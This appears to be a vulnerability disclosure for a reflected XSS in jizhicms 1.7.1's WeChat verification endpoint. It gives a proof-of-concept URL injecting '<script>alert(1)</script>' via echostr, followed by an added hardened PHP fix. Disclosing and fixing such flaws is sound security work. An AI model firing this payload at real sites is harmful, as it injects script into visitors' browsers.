An XSS vulnerability was discovered in jizhicms 1.7.1.
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Wechat/checkWeixin?signature=1&echostr=1.
Vulnerability file: Home/c/WechatController.php
```php
public function index(){
    if (isset($_GET['echostr'])){
        $this->checkWeixin();
    }else{
        $this->responseMsg();
    }
}
```
PoC:
http://example.com/index.php/Wechat/checkWeixin?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&echostr=<script>alert(1)</script>
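
A hardened form of the verification endpoint, as an added example (not jizhicms code and not part of the original report). It assumes the handler follows the standard WeChat callback check, where signature is the SHA-1 of the sorted token, timestamp and nonce; the function names and the token value are hypothetical.

```php
<?php
// Added example, not jizhicms code. Assumes the standard WeChat callback check:
// signature == sha1(token, timestamp, nonce sorted as strings and concatenated).
function wechatSignatureValid(string $token, array $query): bool
{
    // An unconfigured token or missing parameters must fail closed; otherwise
    // the expected value degrades to the SHA-1 of an empty string.
    if ($token === '') { return false; }
    foreach (['signature', 'timestamp', 'nonce'] as $key) {
        if (!isset($query[$key]) || !is_string($query[$key]) || $query[$key] === '') {
            return false;
        }
    }
    $parts = [$token, $query['timestamp'], $query['nonce']];
    sort($parts, SORT_STRING);
    return hash_equals(sha1(implode('', $parts)), $query['signature']);
}

// Returns [HTTP status, body]; echostr is reflected only after a valid signature.
function checkWeixinResponse(string $token, array $query): array
{
    $echostr = $query['echostr'] ?? '';
    if (!is_string($echostr) || !wechatSignatureValid($token, $query)) {
        return [403, ''];
    }
    // Encode anyway so a reflected value can never be parsed as markup.
    return [200, htmlspecialchars($echostr, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')];
}

function sendCheckWeixin(string $token): void
{
    [$status, $body] = checkWeixinResponse($token, $_GET);
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8'); // not rendered as HTML
    header('X-Content-Type-Options: nosniff');
    echo $body;
}

if (PHP_SAPI === 'cli') {
    $token = 'constructed-token'; // constructed sample value
    // Query string from the report's PoC: no timestamp or nonce, so it is rejected.
    $poc = ['signature' => 'da39a3ee5e6b4b0d3255bfef95601890afd80709',
            'echostr' => '<script>alert(1)</script>'];
    var_dump(checkWeixinResponse($token, $poc));
    // Constructed request signed with the token: accepted and echoed.
    $ok = ['timestamp' => '1700000000', 'nonce' => 'n1', 'echostr' => '12345'];
    $p = [$token, $ok['timestamp'], $ok['nonce']]; sort($p, SORT_STRING);
    $ok['signature'] = sha1(implode('', $p));
    var_dump(checkWeixinResponse($token, $ok));
}
```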